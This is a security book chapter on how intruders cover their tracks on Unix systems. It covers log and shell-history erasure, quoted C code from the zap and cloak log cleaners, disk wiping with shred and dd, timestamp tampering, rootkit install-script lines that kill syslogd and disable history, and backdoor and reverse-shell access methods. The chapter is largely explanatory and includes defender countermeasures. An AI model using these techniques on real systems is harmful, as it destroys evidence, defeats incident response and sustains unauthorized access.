Chapter 10. Hiding the Tracks

This chapter deals with hiding your tracks, or not leaving any in the first place (the latter is rarely possible). Specifically, we show how crackers sweep away the evidence of a break-in. We cover the topics of erasing audit records, attempting to defeat forensics, and creating basic covert channels[1] over the network. Also, we show how crackers can come back to an “owned” machine with confidence that it stays owned by them.

From Whom Are You Hiding?

Before planning how to hide your tracks, you must first ask a simple question: from whom are you hiding? Is the target a home user who just bought his first Linux machine at WalMart? His computer will be deployed with all of the default services on and no access control, apart from the password for the mighty “root” user. Or are you up against the paranoid hackers at the local security consultancy, who write secure Unix kernel modules before breakfast and know the location of every bit on their hard drives? Or, the worst-case scenario, is the opponent a powerful government entity armed with special-purpose hardware (such as magnetic force scanning tunneling microscopy, as mentioned in Peter Gutmann’s seminal paper—see Section 10.5 for more information) and familiar with the latest nonpublic data recovery techniques? The relevant tips and tricks are completely different in each of these cases.

Sometimes, hiding does not work, no matter how hard you try; in this case, it’s better to do your thing, clean up, and leave without looking back. This book cannot help you with that. Instead, this chapter aims to provide a general overview of most known hiding methods.

Unless otherwise noted, most of these tips are applicable to a not-too-skilled cracker (from now on referred to as an “attacker”) hiding from a not-too-skilled system administrator (the “defender”), sometimes armed with commercial off-the-shelf or free open source computer forensic tools. In some cases, we will escalate the scenario—for example, in situations where these things happen:

  1. Attacker: logfiles erased and evidence gone

  2. Defender: erased files recovered using standard forensic tools

  3. Attacker: logfiles erased and overwritten with zeros

  4. Defender: parts of logfile survive due to OS peculiarities and are recovered

  5. Attacker: logfiles erased and completely overwritten with zeros

  6. Defender: parts of logfile are found during swap file analysis

  7. Attacker: logfiles erased and completely overwritten with zeros, swap file sanitized, memory dump sanitized, free and slack space sanitized

  8. Defender: data recovered using special hardware

  9. Attacker: logfiles erased using methods aimed to foil the above hardware

  10. Defender: files recovered using the yet-undisclosed novel forensic technique

Obviously, a real situation usually breaks at one of the steps of the above escalation scenario. Thus, we will not go into every possible permutation. The reader might rightfully ask, “What about such-an-such tool? Won’t it uncover the evidence?” Maybe. But if its use is unlikely in most situations, we won’t discuss it here.

We start with hiding your tracks immediately after an attack. Then, we proceed to finding and cleaning logfiles, followed by a section about antiforensics and secure data deletion. Finally, we touch on IDS evasion and provide an analysis of rootkit technology.

Postattack Cleanup

The first step after an attack (exploiting the machine and making sure you can access it later) is cleaning up. What needs to be hidden or at least swept under the rug, on a typical Unix machine being exploited over the network via a remote hole? Here is a short checklist.

System Logs

As described in previous chapters, Unix systems log to a set of plain-text logfiles via the syslog daemon. Depending upon how the machine was exploited, its platform (Solaris, FreeBSD, Linux, etc.), and the level of logging that was enabled, there might be evidence of the following events.

The exploit attempt itself

Consider, for example, this tell-tale sign of a Linux RPC hit:

Oct 19 05:27:43 ns1 rpc.statd[560]: gethostbyname error for 
^X ÿ¿^X ÿ¿^Z ÿ¿^Z ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%62716x%hn%51859x%hn220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220220220220220220220220220220220
220220220220220220220220220220220

The above attack was very common in 2000-2001 and still surfaces in the wild reasonably often. The attacker aims to overflow the buffer in the rpc.statd daemon (part of Unix RPC services) on Linux in order to gain root access. While both successful and failed attacks register in the logs as shown above, the example log signature was generated on a nonvulnerable server.

The attacker’s accesses before the exploit

Did you snoop around that FTP server before exploiting it? If so, look for the following and clean it up:

Oct 15 19:31:51 ns3 ftpd[24611]: ANONYMOUS FTP LOGIN FROM 218.30.21.182 [218.30.21.
182], hehehe@
Oct 15 19:33:16 ns3 ftpd[24611]: FTP session closed

The attacker had to log in to the FTP server in order to launch a privilege escalation attack, which required local privileges. Thus, an access record similar to the above will appear in the logfile, right before the attack.

Erasing logfiles

System logs include more than the obvious /var/log/messages or /var/adm/syslog. Make sure you also look through all the /var/log directories for signs of your IP address or hostname. In fact, it makes sense to look for /etc/syslog.conf to confirm what is being logged and where.

Sometimes, a devious system administrator might rebuild a syslog daemon to not refer to the usual configuration file (/etc/syslog.conf), but rather to use a cover file instead (or to use both). In this case, snooping can find the location of those alternative logs. Killing the system daemon (as performed by most modern Unix rootkits upon installation) is a good common-sense “security” measure. That is, it adds security to a covert access of a target system. However, if an exploit attempt itself is logged to a remote log server, it might be too late to kill the daemon—the tell-tale signs are already recorded in the safe location.

Cleaning plain-text logs does not require any sophisticated tools. A text editor, right down to command line-based sed or awk, will do. Table 10-1 lists the available options in more detail, in order of increasing detection difficulty.

Table 10-1. Logfile cleansing actions and countermeasures

Attacker action

Defense countermeasures

Logfiles erased

Highly visible; at least some part might be unerased using raw access to the filesystem, unerase tools (where available), or simple forensic tools

Logfiles wiped (zeroed on disk)

Highly visible; traces might still be found in swap

Logfiles edited and saved

Not very visible (unless a large time period is absent from a logfile); parts might be unerased using raw access to the filesystem, unerase tools (where available), or simple forensic tools

Logfiles edited and appropriate parts zeroed on disk

Not very visible (unless a large time period is absent from a logfile); likely cannot be unerased if the wiping routing works as advertised

In real life, the most common scenario involves either the deletion or editing of logfiles without any additional effort on the attacker’s part. Often, the filesystem implementation is somewhat on the attacker’s side, and parts of the removed content are simply overwritten on disk by the subsequent disk activity.

Application Logs

Depending upon the location of the entry into the system, various application logs might contain evidence of sudden conquest, preliminary probing, and subsequent system accesses. The simplest example is an FTP log (usually located with other system logs) or web server log (for the case of Apache, usually stored in /var/log/httpd). Here is an example of a recent SSL worm exploit hit in the Apache logfile:

[Thu Nov 21 08:04:36 2002] [error] mod_ssl: SSL handshake failed (server ns1.
bkwconsulting.com:443, client 24.199.239.142) (OpenSSL library error follows)

[Thu Nov 21 08:04:36 2002] [error] OpenSSL: error:1406908F:lib(20):func(105):
reason(143)

[Thu Nov 21 08:04:37 2002] [notice] child pid 11175 exit signal Segmentation fault (11)

The above signature was left on a vulnerable Red Hat Linux machine (a “honeypot”) exploited by the SSL worm.

This evidence should be cleaned up much like standard Unix logs: simply remove any “suspicious” entries. Since the logs are text files on a disk, the above discussion about evidence removal applies here as well. Overall, if the files are not reliably zeroed out on the disk, there is a chance that the investigators might recover some parts or even the whole log.

Unix Shell History

Another critical evidence source is the Unix shell history. Most shells, such as sh (Free/OpenBSD standard), bash (common for Linux distributions), csh (common on Sun Solaris machines), and tcsh (modern incarnation of C shell), produce and save all executed commands in a shell history file (e.g., .bash_history or .history) by default. These files must be cleaned after a break-in. It is worthwhile to note that bash only writes a new session history upon the session exit; thus, erasing a history file during the session only removes old data, not the data from the currently running session. When the user logs in to the Unix system, his command shell session is started and the recording of the command-line history commences. When the user logs out or disconnects, the shell performs the act of writing the typed commands into a history file. Thus, erasing the file during the session will not have the desired effect of removing the traces of the connection.

Here is an example of a real-life bash shell session history left by a careless attacker on a honeypot:

cd luckroot
ls
./luckgo
./luckgo 66 22
./luckgo 212 22
cd /blacki
ls
rm -rf luck.tar.
clear
uptime
cd dos
./vadimI 10.10.10.10
./vadimI 10.11.12.13

The commands indicate that an attacker did a fair bit of exploit scanning (using the classic “luck” exploit scanner). He scanned two B-classes (around 128,000 IP addresses). Then he cleaned up some files (rm) and proceeded to “DoS the shiznat” out of his enemies using the antiquated but still deadly (for people with slow connections) UDP flooder “vadim”.

It should be noted that even if the attacker’s rootkit had removed those lines and disabled bash history, the covert bash monitoring software would have recorded them and sent them to the system for analysis. Thus, the tips outlined below still would not have worked.

Overall, dealing with shell history involves two actions:

  • Preventing its generation

  • Removing existing history

Table 10-2 is a summary of the above actions for commonly used Unix shells.

Table 10-2. Attacker cleanup on Unix shells

Shell

History prevention

History cleanup

bash (Linux)

export HISTSIZE=0

export HISTFILE=/dev/null

export HISTSIZE=0

rm .bash_history

tcsh (Linux)

set histfile=/dev/null

set savehist=0

rm ~/.history

csh (Solaris)

set history =0

rm ~/.sh_history

ksh (Solaris)

set HISTFILE=/dev/null

set HISTSIZE=0

 

Keep in mind that a shell might save the history file after the session is ended; thus, all manipulations of the history file should be done after the session is closed and a new one is opened. It might be wise to set the history file to /dev/null, then log out and erase the old one. Taking these steps assures that a new history is not generated.

Again, since history files are plain-text files located on a disk, the arguments from Table 10-1 apply. Erasing the files might hide them from some investigators, but those with forensic tools have an excellent chance of uncovering them. If higher “security” is desired, the files should be wiped by a wiping tool (simple) or edited with removed parts wiped from the disk (more complex).

Unix Binary Logs

As we will discuss in Chapter 18, Unix systems produce several kinds of binary logs. These are divided into process audit records and login records . The former needs to be enabled on most Unix systems, while the latter are always generated. Many hacker tools are written to “sanitize” login records, which means covertly removing undesirable, implicating records. Common examples of such tools are zap, clear, and cloak.

These tools operate in two distinct ways: they either zero out/replace the binary log records (stuffing the file with zero records, which is suspicious) or they erase them (making the logfile shorter, which is also suspicious). Both methods have shortcomings, and both can be detected.

Here is how the zap tool zeros out login records in /usr/adm/lastlog on Solaris:

if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
    lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
    bzero((char *)&newll,sizeof( newll ));
    write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }

Note the commands bzero and write, which do the trick. This code excerpt is quoted from http://spisa.act.uji.es/spi/progs/codigo/ftp.technotronic.com/unix/log-tools/zap.c.

Here is how the cloak tool accomplishes the same goal:

lseek(fd, size*getuid(  ), SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, "ttyq2 ", 5);
gethostname(l.ll_host, 16);
lseek(fd, size*getuid(  ), SEEK_SET);

Notice the use of read and strncpy. This example is quoted from http://spisa.act.uji.es/spi/progs/codigo/ftp.technotronic.com/unix/log-tools/cloak.c.

A nice tutorial on how such tools work is available at http://packetstormsecurity.nl/Unix/penetration/log-wipers/lastlog.txt. This tutorial covers the design and implementation of one log cleaner, with full commented source code in C.

Other tools sometimes can replace the telltale records with supposedly innocent information, but it’s easily discovered if a defender knows what to look for.

Overall, few of the tools commonly seen in the wild actually make an effort to make erased logs harder to recover, in part because the disk area where logs are stored has a high chance of being overwritten. In fact, it might be easier to erase the records and then generate a lot of innocent-looking log data in order to flush the disk with it. One log-erasing tool is shroud (http://packetstormsecurity.nl/Unix/penetration/log-wipers/shroud-1.30.tgz). It erases various logs and uses one of the reliable deletion programs (van Hauser’s srm) to try to destroy them on disk. Similarly, tools exist that clean process audit records (e.g., acct-cleaner).

Here is an example of some malicious activity recorded by Unix process audit:

crack           badhacker    stdin     99.90 secs Wed Nov 20 20:59

It shows that an attacker used the password-cracking crack tool to break passwords. Obviously, if the tool had been renamed, the process audit records would not have shown any mischief.

Other Records

Other records might also be generated on the system. Here is the trick to find them—it should be done as “root”. root access is needed anyway to “correct” the audit records of your presence.

Upon login, create a file using touch /tmp/flag. Then, right before you are about to leave the machine, run find ~ -newer /tmp/flag -print. This command shows files that have changed since your login.

To dig deeper and look for files changed right before the login, mark the time that your session started and run find ~ -mmin 5 -print (if it started five minutes ago or less). These tips are from van Hauser’s “HOW TO COVER YOUR TRACKS” guide, available online. Unix systems keep track of timestamps by default; thus, these commands are almost guaranteed to work.

Forensic Tracks

Now that you are reasonably sure[2] that there are no traces of your attack in the logfiles, it is time to take concealment to the next level.

File Traces

Even if you are sure that the OS audit trail is clear, the shell histories, source files, and logfiles you erased and even your keystrokes might hide in many places on the system. The vigor with which you pursue these traces depends on what’s at stake as well as the skill of your adversaries. Uncovering erased data is simple on Windows and only slightly more difficult on Unix filesystems. However, you can be sure that there is always a chance that a file subjected to the wrath of /bin/rm will come to life again (as a zombie). The research (such as the famous paper “Secure Deletion of Data from Magnetic and Solid-State Memory,” by Peter Gutmann) indicates that there is always a chance that data can be recovered, even if it has been overwritten many times. Many tools are written to “securely erase” or “wipe” the data from a hard drive, but nothing is flawless. However, these tools have a chance of foiling a forensics investigation. In fact, there are even tools “marketed” (in the underground) as antiforensics. An example is the notorious Defiler’s Toolkit, described in Phrack #59 (file #0x06, “Defeating Forensic Analysis on Unix”). It’s rarely used and is usually overkill, but the kit demonstrates that advanced hackers may easily make forensics investigation onerous or even impossible. In fact, the author of the paper laments the poor state of computer forensics and the lack of advanced data discovery tools.

One of the main issues with secure deletion of data is that the filesystem works against the attacking side (which attempts to hide or remove data) and the defending side (which seeks to uncover the evidence). Often, Unix filesystems overwrite the drive area where the removed files were located (this is especially likely to happen to logfiles). On the other hand, the filesystem has an eerie tendency to keep bits and pieces of files where they can be found (swap, /tmp area, etc.). Overall, reliably removing everything beyond recovery is just as difficult as reliably recovering everything.

There are a lot of Unix tools that claim to reliably erase data. However, many of them use operating system disk-access methods that tend to change, since OS authors do not have to be concerned about preserving low-level access to the disk—it goes unused by most applications. Such changes have a good chance of rendering a wiping tool ineffective. Thus, unlike other application software, a wiping tool that performs just fine on Red Hat Linux 7.1 might stop working for 7.2.

The simpler, more reliable way of erasing all host traces (without destroying the drive) requires your presence at the console. For example, the autoclave bootable floppy system (http://staff.washington.edu/jdlarios/autoclave/) allows you to remove all traces of data from the IDE hard disk (SCSI is not supported). In fact, it removes all traces of just about everything and leaves the disk completely filled with zeros or random patterns.

Unlike the programs that run from a regular Unix shell (such as many incarnations of wipe and shred), autoclave has its own Linux kernel and wiping utility that ensures erased means gone. In this case, you can be sure the filesystem or OS does not play any tricks by inadvertently stashing bits of data somewhere. However, autoclave is not useful for remote attackers, since inserting a floppy into the machine might be problematic and removing everything with 38 specially crafted character passes, while extremely (in all senses extremely) effective, might bring attention to an otherwise inconspicuous incident. The process is also painfully slow and might take days for a reasonably large hard drive. A single “zero out” pass takes at least 3 hours on a 20-GB drive with modern disk controllers. Many similar mini-OS bundles exist for reliably cleaning the disks.

Thus, in real life, under time pressure, you must rely on application-level deletion tools that use whatever disk access methods the OS provides and sometimes miss data. Even the best wiping tools (including those with their own kernels, such as autoclave) are not guaranteed against novel and clandestine forensics approaches that involve expensive custom hardware.

Here is an example of using GNU shred, the secure deletion utility that became standard on many Linux and *BSD distributions:

#shred -zu ~/.bash_history

This command erases the above shell history file with 25 overwrite cycles, inspired by Gutmann’s paper. Or, rather, it tries to erase the file. However, the user will likely have no idea whether it was erased or not. Many things can get in the way: filesystem code, caches, and so on. While the tool authors do take care to make sure that the erased bits are really erased, many factors beyond their control can intervene. For example, even if shred works for you with the ext2 filesystem on Linux, you still need to test it to know whether it works on ext3 or ReiserFS. As pointed out by one wiping tool’s author (http://wipe.sourceforge.net), “if you’re using LFS[3] or something like it, the only way to wipe the file’s previous contents (from userspace) is to wipe the whole partition...”

You can test the behavior of your wiping tool on your specific system with the following sequence of commands. They check whether the tool actually wipes the data off the floppy disk:

# mkfs -t ext2 /dev/fd0

Create a fresh Linux ext2 filesystem on a floppy disk.

# mount /mnt/floppy

Mount the floppy to make the created filesystem available.

# dd if=/dev/zero of=/mnt/floppy/oooo ; sync ; /bin/rm /mnt/floppy/oooo ; sync

Zero the disk using the dd command in order to remove prior data.

# echo "some data" > /mnt/floppy/TEST

Create a test file.

# sync

Make sure the file is in fact written to the disk.

# strings /dev/fd0 | grep data

Confirm that the data is indeed written to disk.

# shred -vuz /mnt/floppy/TEST

Remove the file using (in this case) the GNU shred utility.

# umount /mnt/floppy

Unmount the filesystem to make absolutely sure the file is indeed wiped.

# strings /dev/fd0 | grep data

Try to look for the file data on disk (should fail—i.e., nothing should be seen).

You should see nothing in response to the last command. If you see some data, the secure wipe utility fails the test. The GNU shred utility passes it just fine. However, the test is not conclusive, since the floppy often has a different filesystem from the hard drive; thus, the tool might not pass the test for the real hard drive. Additionally, sometimes the drive hardware plays its own games and doesn’t actually write the data, even if synced. In this case, the data might be retained in the drive’s internal memory.

In many cases, even makeshift solutions such as this will help. Suppose you are erasing the file .bash_history from the directory /home/user1. The following commands attempt to make recovery problematic:

#/bin/rm ~user1/.bash_history
# cat /dev/zero > /home/user1/big_file
(until file system overflows and "cat" command exits)
# sync
# /bin/rm /home/user1/big_file

The Unix dd command may be used in place of cat, as in the floppy example above.

The trick is to remove the file and then make the system allocate all the disk space on the same partition for big_file with zeros, just as in our floppy test above. Even though the sync command is supposed to copy all the memory buffers to disk, the operation has a chance of not working due to caches, buffers, and various filesystem and drive firmware idiosyncrasies.

These steps make it more difficult to recover erased data. It makes sense to deal similarly with swap, which can contain pieces of your “secret” data. The procedure to do this for a Linux swap partition (swap can also be a file, which makes cleaning it easier) is straightforward. It involves disabling swap, usually with swapoff, and then writing data (such as zeros or special characters) to a raw partition starting from a swap file header. The Sswap utility from the THC secure_delete kit automates the process—except that turning off swap should be done manually. The utility handles Linux swap files by default and might be able to clean other Unix swap files.

Placing the data on a disk to specifically foil forensic tools sounds like overkill for almost any attack. However, the methods to do so are available (see, for example, “Defeating Forensic Analysis on Unix” in Section 10.5). Certain tools can clean up filesystem data that is used by forensic tools to uncover evidence. A good example is cleaning inodes data on the ext2 Linux filesystem—this data is used by forensic tools (such as TCT and TASK) to find deleted files.

In some cases, even the hardware might revolt against the attacker. Certain disk controllers combine the write operations, thus decreasing the number of passes applied. Basically, the disk drive controller firmware sees that you are trying to write zeros, say, five times, and will just write them once, assuming that is what you want. Similarly, the OS built-in sync command might have an affect on the drive’s built-in memory cache, thus also thwarting attempts to wipe the data.

Timestamps

Another critical forensics trace, and one that will always be left on the system, is timestamps. Consumer operating systems such as Windows 9x/Me keep track of changes to files by adjusting the file timestamp; i.e., the modification time. Other OSs record much more.

Most Unix filesystems record not only when the file was changed (modified time, or mtime) and when its properties (such as permissions) were changed (change time, or ctime), but when the file was last accessed for reading (access time, or atime). Together, these timestamps are referred to as MAC times (Modify-Access-Change times).

Here is how Linux ext2 stores the times for each inode (filesystem unit in ext2):

struct ext2_inode {
...other fields...
        _  _u32        i_atime;        /* access time - reading */
        _  _u32        i_ctime;        /* change time - permissions  */
        _  _u32        i_mtime;   /* modification time - contents */
        _  _u32        i_dtime;        /* deletion time - or 0 for non-deleted files*/
...other fields...

For each inode, four times are stored by the filesystem as 32-bit unsigned integers.

Here is an example excerpt from the MAC-robber tool (by Brian Carrier; see http://www.sleuthkit.org/mac-robber/desc.php), which collects all such timestamps from Unix files. The first line shows the format of the file (MAC times are in bold).

md5|file|st_dev|st_ino|st_mode|st_ls|st_nlink|st_uid|st_gid|st_rdev|st_size|st_
atime|st_mtime|st_ctime|st_blksize|st_blocks
0|/usr/local/bin|769|48167|16877|drwxr-xr-
x|2|0|0|5632|4096|1057911753|1050935576|1050935576|4096|8
0|/usr/local/bin/a2p|769|48435|33261|-rwxr-xr-
x|1|0|0|2816|107759|0|1018888313|1050509378|4096|224
0|/usr/local/bin/argusarchive|769|48437|33261|-rwxr-xr-
x|1|0|0|2816|3214|1057910715|1022848135|1050509378|4096|8
0|/usr/local/bin/argusbug|769|48438|33133|-r-xr-xr-
x|1|0|0|2816|9328|1057910715|1022848135|1050509378|4096|24
0|/usr/local/bin/c2ph|769|48439|33261|-rwxr-xr-
x|2|0|0|2816|36365|0|1018888313|1050509379|4096|72

The timestamps, such as “1050935576”, show as numbers of seconds since January 1970, the standard time notation on Unix systems (“Unix epoch time”). The above number actually stands for “Monday, April 21, 2003 2:32:56”.

Many conversion tools are available (e.g., http://dan.drydog.com/unixdatetime.html or http://www.onlineconversion.com/unix_time.htm). A Google query for “1970 Unix time convert” provides numerous examples.

The critical issue of timestamps is that collecting them on a running filesystem changes the atime, since the file has to be accessed in order to check the timestamp. That is exactly the reason why forensics manuals recommend working with a read-only copy of the evidence.

For any running program under Unix, many libraries and system files are usually called. Thus, a running program leaves a wake of running waves of changing atimes. Such changes may be detected. Obviously, the changed files will have their ctimes reset as well.

Countermeasures

There are two main methods to try to stop these information leaks about your activities on a system. One is to remount the filesystem in such a way that no atime timestamps are collected. It may be accomplished under Linux using the command:

#mount -o noatime,remount /dev/hda1 /usr

This prevents the atime analysis, while doing nothing to ctime and mtime changes. Even more effective is mounting the filesystem as read-only, as follows:

#mount -o ro,remount /dev/hda1 /usr

This effectively prevents all timestamp changes, but it might be impractical if changes to the partition are needed.

Timestamps in Unix can also be changed manually using the touch command; e.g., touch -a /tmp/test changes the atime of a file /tmp/test, while touch -m /tmp/test affects the mtime. The command may also be used to set the time needed on a file and to copy the timestamp from a different file. touch is an effective tool to influence time stamps. Just keep in mind that running the touch command creates the usual atime wake.

Yet another method is to go ahead and access all the files, so that all timestamps are changed. This can be done via the touch command or other means. For example, you can loop through all the files to touch them and thus distort all accessible timestamps, so that forensic investigators see all files as modified.

Going to such lengths to thwart host forensics might be futile if the data resides on network devices or other machines. Network devices (such as routers) and security devices (firewalls, IDSs) might still remember you and remain out of your reach.

Maintaining Covert Access

This segment deals with rootkits , automated software packages that set up and maintain your environment on a compromised machine. Rootkits occupy an important place in a hacking tool chest. Originally, rootkits were simply tar archives of several popular binaries (likely to be run by system administrators of the compromised machines), along with several other support programs, such as log cleaners. For example, /bin/ps, /bin/login, and /bin/ls were often Trojaned in order to hide files and maintain access. Here is a list of binaries often replaced (from http://www.chkrootkit.org): aliens, asp, bindshell, lkm, rexedcs, sniffer, wted, scalper, slapper, z2, amd, basename, biff, chfn, chsh, cron, date, du, dirname, echo, egrep, env, find, fingerd, gpm, grep, hdparm, su, ifconfig, inetd, inetdconf, identd, killall, ldsopreload, login, ls, lsof, mail, mingetty, netstat, named, passwd, pidof, pop2, pop3, ps, pstree, rpcinfo, rlogind, rshd, slogin, sendmail, sshd, syslogd, tar, tcpd, top, telnetd, timed, traceroute, w, and write.

This list demonstrates that almost nothing is immune from Trojaning by rootkits and also emphasizes that “fixing” after the intrusion is nearly futile. A rebuild is in order.

Unix rootkits were first mentioned in 1994, after being discovered on a SunOS system. However, many tools that later became part of rootkits were known as long ago as 1989. There are three main classes of rookits available today: binary kits, kernel kits, and library kits. However, rootkits found in the wild often combine Trojaned binaries with the higher “security” provided by the kernel and library components.

Let’s examine some rootkits. After gaining access, an attacker typically downloads the kit from his site or a dead drop box,[4] unpacks it, and runs the installation script. As a result, many system binaries are replaced with Trojaned versions. These Trojans usually serve two distinct purposes: hiding tracks and providing access. The installation script often creates a directory and deploys some of the support tools (log cleaners, etc.) in the new directory. This same directory is often used to store the original system binaries so that they’re available to the attacker. After the kit is installed, the system administrator inadvertently runs Trojaned binaries that will not show the attacker’s files, processes, or network connections. A Trojaned /bin/login (or one of the network daemons) binary provides remote access to a machine based on a “magic” password. This is the style of operation employed by the famous login Trojan, which looked for the value of the $TERM environment variable. If the value matched a hardcoded string, the login let the attacker through; if the value did not match the control, it was handed to the original login binary and the authentication process continued as usual.

The level of rootkit sophistication has grown over the years. More and more binaries have been subverted by attackers and included in rootkits. Local backdoors, such as “root on demand,” have been placed in many otherwise innocuous programs. If a program executes SUID root, it can be used as a local backdoor to provide root access. For example, a backdoored ping utility is often seen in Linux rootkits. In fact, one rootkit author sincerely apologizes in the kit’s README file for not including top (a program to show running processes) in the previous version and for delaying the release of this popular “customer-requested” feature.

A lot of development went into creating better and more user-friendly (should we say hacker-friendly?) installation scripts. Colors, menus, and automated OS version detection and configuration began showing up in kits as they matured through the late 1990s. Installation scripts became able to automatically clean logs, look for dangerous configuration options (like enabled remote logging), seek and destroy competing rootkits (ironically, by borrowing components from the antirootkit tool, chkrootkit, from http://www.chkrootkit.org), and perform decent system hardening, complete with plugging the hole used to attack the system. One of the rootkits refers to “unsupported” versions of RedHat Linux and offers limited email installation support for the kit itself.

Another area where great progress has occurred is in rootkit stealth properties. Kernel-level or LKM (Loadable Kernel Module) kits rule in this area. Unlike regular kits that replace system files, LKM kits (publicly available for Linux, Free/OpenBSD, and Solaris) hook into the system kernel and replace (remap) or modify (intercept) some of the kernel calls. In this case, the very core of the operating system becomes untrusted. Consequently, all of the system components that use the corrupted kernel call can fool both the user and whatever security software is installed.

Rootkits have also increased in size due to the amazing wealth of bundled tools, such as attack scanners. Typical rootkit tools are reviewed in the following sections.

Hiding

Let’s analyze how rootkits accomplish the goal of hiding your tracks. First, the rootkit hides its own presence, the presence of other intruders’ files, and evidence of access. Here is an excerpt from a recent Linux rootkit installation file:

unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
...
killall -9 syslogd
chattr +i /root/.bash_history
...

The kit disables history file generation via two different methods. First of all, the kit disables HISTORY. This works for the current session and makes the existing root history saved file “immutable”—i.e., not editable by any program on the system, even root. In addition, the kit warns about remote logging and suggests that its user “go hack the syslog aggregation box”—a feat that might well be beyond the ability of an average script kiddie.

The kit referenced above did not perform automated log cleaning; instead, it included the appropriate tools and some tips on how to use them. Killing syslog seems like a way to draw attention, but further in the installation script a “new” (i.e., Trojaned) version of syslogd software is deployed and executed. This one ignores some IP addresses, some processes, and some users. Any message containing any of the above will not be recorded. For example, if user “evil” logs in via FTP, none of her FTP accesses are logged in the system files, provided that the malicious syslogd was configured to prevent this. Likewise, if any user connects from 166.61.66.61 (the evil IP address), nothing is logged.

Rootkits often take measures to hide their own files and other attackers’ files. The oldest trick in the book is for the rootkit to obscure its own location on the disk. Even expert system administrators might not look at the entire disk every day. However, understanding the functionality of every piece of your system clearly helps to avoid some surprises. In general, only integrity checking software (such as Tripwire) can find these malicious files. Unfortunately, there are tricks that kernel rootkits play that can even defeat them.

Here are some of the locations used by the kits:

/dev/.hdd
/etc/rc.d/arch/alpha/lib/.lib
/usr/src/.poop
/usr/lib/.egcs
/dev/.lib
/usr/src/linux/arch/alpha/lib/.lib/.1proc
/usr/src/.puta
/usr/info/.t0rn
/etc/rc.d/rsha

There are many others. In fact, it is just too easy to change the default location. The above list demonstrates the pattern of thinking manifested by rootkit authors: hiding files in /etc (where they might look like system files of unclear purpose), rarely used locations (such as /usr/src or /usr/info), or /dev (where no user-utilized programs reside).

Here is an excerpt from a rootkit configuration file that shows parameters hiding, apparently based on K2’s Universal Root Kit (URK):

[file]
file_filters=rookit,evilfile1
[ps]
ps_filters=nedit,bash
[netstat]
net_filters=hackersrus.ro

The rootkit components refer to the above file and hide the references files and connections from Unix binary tools. URK is an old, multiplatform kit that replaces several system binaries with Trojaned versions.

LKM kits take the art of hiding to the next level. Using the loadable kernel module (a piece of software injected into a running Unix kernel), the kits are able to achieve near-total control over the system. See Section 10.5 for the analysis of the well-known LKM kit Knark.

Library Trojan kits, of which Torn 8 is the most famous representative, use a somewhat different method to elude detection. They add a special system library (called libproc.so by default) that is loaded before other system libraries. The library has copies of many library calls that are redirected in a manner similar to the kernel module. It’s the user-space equivalent of kernel module-based redirection.

However scary this LKM rootkit technology might be, it is not on the bleeding edge of system hiding. Simply disabling the loading of modules within the Unix/Linux kernel can defeat most LKM kits; it’s usually a compile-time option for open source Unix variants. Silvio Cesare, in his paper “runtime-kernel-kmem-patching.txt,” showed that loadable modules are not required for intruding upon the Unix kernel. Several kits have since turned this research advance into production code. For example, SucKit is a user-friendly package that installs in the kernel and allows covert remote login, all without the need to insert any modules. The technique invented by Silvio Cesare works for both the 2.2 and 2.4 kernels.

Rootkits also help attackers to regain ground in case the system administrator locates and removes part of the attackers’ tools. However many times it has been advised that a compromised system should be rebuilt, real life dictates otherwise. While the rootkits might make the system more difficult to hack from the outside, the kits often “weaken” the Unix system from the inside. Thus, if an attacker loses ground, and even a little CGI-based backdoor remains, all is not lost and the “root” can be regained.

Other items commonly seen in rootkits assist with the game of hide-and-seek on the compromised system. For instance, multiple Trojaned binaries allow attackers to regain root control even if the main method (such as a login Trojan with a magic password) is located and eliminated. Similarly, a seemingly innocuous ping (often SUID root) can hide a five-line code modification that spawns a root shell.

Hiding becomes complicated if some other “guest” is hiding on the same system as well. Some rootkits contain advanced antirootkit tools that can seek and destroy other kits, DDoS zombies, or worms that have previously taken over the system.

Hidden Access

It’s also important for an attacker to covertly access the compromised system. Let us review some of the methods used for this purpose by attackers. The methods are as follows (approximately from least to most covert):

Telnet, shell on high port

The first method is simply connecting to a system via telnet or the old inetd backdoor (a shell bound to a high port on a system). This option isn’t covert at all; it’s easily detected, and we only mention it for reference. The high port shell allows you to hide from only the most entry-level Unix administrators, since the connection will not leave records in system logs, unlike the stock telnet. This backdoor dates back to the 1980s, and maybe even earlier.

ssh (regular, Trojaned, and on high port)

ssh is the tool of choice for amateur attackers. Deploying a second ssh daemon running on a high port (such as 812 or 1056 TCP) on a compromised machine is the modus operandi of many script kiddies. This method provides several advantages over using telnet, since communication is encrypted and suspicious commands cannot be picked up by the network IDSs. Custom telnet daemons also will not leave evidence in logfiles upon connecting. However, both ssh and telnet show up in response to the netstat command (provided that it is not Trojaned). This technique becomes more effective under the cover of Trojan binaries or kernel rootkits that hide the connection from the sysadmin.

UDP listener

UDP services are more difficult to port scan than TCP and are usually less likely to be found. If a backdoor listens on the UDP port, there is less chance that it will be discovered. Obviously, the listening program might be detected, but (unlike with TCP) if one packet is sent per minute, the communication is less likely to be detected. As with TCP, it makes sense to Trojan netstat and other tools that might reveal the presence of a backdoor.

Reverse shell/telnet

A backdoor that opens a connection from a target to an attacker’s machine is better than a regular connection, since the target should not have any new open ports that can be firewalled—such as by personal firewall or host-based ACL (Access Control List) protection—against inbound connections. The connection can also be encrypted and thus shielded from a network IDS. However, many people find it unusual if their servers start to initiate connections to outside machines. Moreover, some outbound connections can be blocked on the border firewall. The hacker’s machine should be running something like netcat (nc) to listen for inbound connections.

ICMP telnet

